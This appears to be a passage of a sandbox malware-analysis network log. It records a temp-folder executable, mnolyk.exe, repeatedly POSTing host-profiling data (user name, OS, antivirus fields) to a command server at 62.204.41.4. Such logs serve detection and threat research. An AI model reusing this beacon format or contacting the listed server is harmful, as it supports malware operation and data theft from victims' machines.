                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:05.545506954 CET180INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          600192.168.2.65032562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:40.711952925 CET755OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:40.775124073 CET755INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          601192.168.2.65032662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:40.953159094 CET756OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:41.014763117 CET756INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          602192.168.2.65032762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:41.188879967 CET757OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:41.252693892 CET757INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          603192.168.2.65032862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:41.453965902 CET758OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:41.523385048 CET758INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          604192.168.2.65032962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:41.705909014 CET759OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:41.767422915 CET759INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          605192.168.2.65033062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:41.942562103 CET760OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:42.005326986 CET760INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          606192.168.2.65033162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:42.173293114 CET761OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:42.237587929 CET761INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          607192.168.2.65033262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:42.434856892 CET762OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:42.499845028 CET762INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          608192.168.2.65033362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:42.674478054 CET763OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:42.738182068 CET763INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          609192.168.2.65033462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:42.924732924 CET764OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:42.988635063 CET764INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          61192.168.2.64978162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:05.723793983 CET181OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:05.788511992 CET181INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          610192.168.2.65033562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:43.169375896 CET765OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:43.234117985 CET765INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          611192.168.2.65033662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:43.422466040 CET766OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:43.485089064 CET766INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          612192.168.2.65033762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:43.661817074 CET767OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:43.726258039 CET767INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          613192.168.2.65033862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:43.908584118 CET768OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:43.971452951 CET768INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          614192.168.2.65033962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:44.150749922 CET769OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:44.215348959 CET769INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          615192.168.2.65034062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:44.394521952 CET770OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:44.458031893 CET770INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          616192.168.2.65034162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:44.643208981 CET771OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:44.706828117 CET771INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          617192.168.2.65034262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:44.892172098 CET772OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:44.955727100 CET772INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          618192.168.2.65034362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:45.134037018 CET773OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:45.200069904 CET773INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          619192.168.2.65034462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:45.384588957 CET773OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
